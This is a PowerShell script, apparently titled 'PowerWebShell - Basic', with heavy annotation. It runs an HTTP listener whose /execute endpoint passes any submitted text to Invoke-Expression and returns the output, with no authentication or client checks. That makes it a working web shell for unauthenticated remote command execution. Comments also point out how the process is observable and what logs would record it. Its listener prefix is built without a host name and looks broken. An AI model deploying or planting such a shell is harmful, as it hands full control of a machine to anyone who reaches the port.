PowerWebShell - Basic
# PowerShell Web Command Executor
# WARNING: This script allows remote command execution and poses significant security risks
# Use only in isolated/trusted environments with proper security measures
#
# What the code below does, as written:
#   * registers a System.Net.HttpListener on $prefix (plain http://, no TLS) and
#     serves requests one at a time from a single loop;
#   * GET /         -> returns an HTML form whose inline script POSTs to /execute;
#   * POST /execute -> hands the "command" form field to Invoke-Expression and
#                      returns the merged output as text/plain;
#   * anything else -> 404.
# No branch examines a credential, the caller's address, or a request Origin,
# so the /execute path is reachable by any client that can reach the port, and
# the commands run in the security context of the account running this script.
# Configuration
$port = 8080
$prefix = "http://" + $port + "/"
# Create HTTP listener
# On Windows, HttpListener registers its prefix with http.sys; that registration
# and the listening port are where this process is observable from outside.
$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add($prefix)
$listener.Start()
Write-Host "Server started on" $prefix
Write-Host "Press Ctrl+C to stop"
Write-Host ""
Write-Host "SECURITY WARNING: This server allows remote command execution!"
Write-Host ""
try {
# Each iteration handles exactly one request. GetContext() blocks until a
# request arrives, so requests are served serially; there is no threading here.
while ($listener.IsListening) {
# Wait for request
$context = $listener.GetContext()
$request = $context.Request
$response = $context.Response
$output = ""
# Handle different request types
# Routing is on HTTP method + path only; nothing about the client is checked.
if ($request.HttpMethod -eq "GET" -and $request.Url.AbsolutePath -eq "/") {
# Serve HTML form
# The here-string is sent verbatim as the page body. Its script POSTs the text
# box contents to /execute as application/x-www-form-urlencoded
# ("command=" + encodeURIComponent(value)) and prints the response text into
# the <pre id="output"> element.
$html = @"
<!DOCTYPE html>
<html>
<head>
<title>Command</title>
</head>
<body>
<form id="cmdForm">
<input type="text" id="command" name="command" size="50" autofocus>
<button type="submit">Run</button>
</form>
<pre id="output"></pre>
<script>
document.getElementById('cmdForm').addEventListener('submit', async (e) => {
e.preventDefault();
const command = document.getElementById('command').value;
const outputDiv = document.getElementById('output');
if (!command.trim()) {
outputDiv.textContent = '';
return;
}
outputDiv.textContent = 'Executing...';
try {
const response = await fetch('/execute', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: 'command=' + encodeURIComponent(command)
});
const result = await response.text();
outputDiv.textContent = result;
} catch (error) {
outputDiv.textContent = 'Error: ' + error.message;
}
});
</script>
</body>
</html>
"@
$buffer = [System.Text.Encoding]::UTF8.GetBytes($html)
$response.ContentType = "text/html"
$response.ContentLength64 = $buffer.Length
$response.OutputStream.Write($buffer, 0, $buffer.Length)
}
elseif ($request.HttpMethod -eq "POST" -and $request.Url.AbsolutePath -eq "/execute") {
# Execute command
# The whole request body is read into memory; no size limit is applied.
$reader = New-Object System.IO.StreamReader($request.InputStream)
$body = $reader.ReadToEnd()
$reader.Close()
# Parse command from POST data
# Only the first "command=" field is used, up to the next '&'.
# UnescapeDataString decodes %XX sequences but leaves '+' as a literal '+',
# so a client that encodes spaces as '+' (classic form encoding) is not
# decoded the same way as the browser form's encodeURIComponent output.
$command = ""
if ($body -match "command=([^&]*)") {
$command = [System.Uri]::UnescapeDataString($matches[1])
}
# This console echo is the only record the script itself keeps of what it ran;
# nothing is written to a file or the event log. Where PowerShell script block
# logging is enabled, that is typically what would capture the text handed to
# Invoke-Expression below.
Write-Host ("Executing: " + $command)
try {
# Execute the command and capture output
# Invoke-Expression evaluates the client-supplied string as PowerShell with
# the privileges of this process. 2>&1 merges the error stream into the
# success stream, so non-terminating errors end up in $output rather than in
# the catch block; Out-String collapses the pipeline into one text blob.
$result = Invoke-Expression $command 2>&1 | Out-String
$output = $result
}
catch {
# Only terminating errors reach here; the exception message (not the stack
# trace) is what goes back to the client.
$output = "Error: " + $_.Exception.Message
}
# The full command output is returned to the caller as plain text.
$buffer = [System.Text.Encoding]::UTF8.GetBytes($output)
$response.ContentType = "text/plain"
$response.ContentLength64 = $buffer.Length
$response.OutputStream.Write($buffer, 0, $buffer.Length)
}
else {
# 404 for other paths
# Unlike the two branches above, ContentLength64 is not set here, so how the
# body is framed is left to HttpListener on Close().
$response.StatusCode = 404
$buffer = [System.Text.Encoding]::UTF8.GetBytes("Not Found")
$response.OutputStream.Write($buffer, 0, $buffer.Length)
}
# Ends the response for this request before the loop blocks on the next one.
$response.Close()
}
}
finally {
# Runs when the loop exits for any reason (listener stopped, or an exception
# escaping the loop) and releases the prefix registration.
$listener.Stop()
Write-Host "Server stopped"
}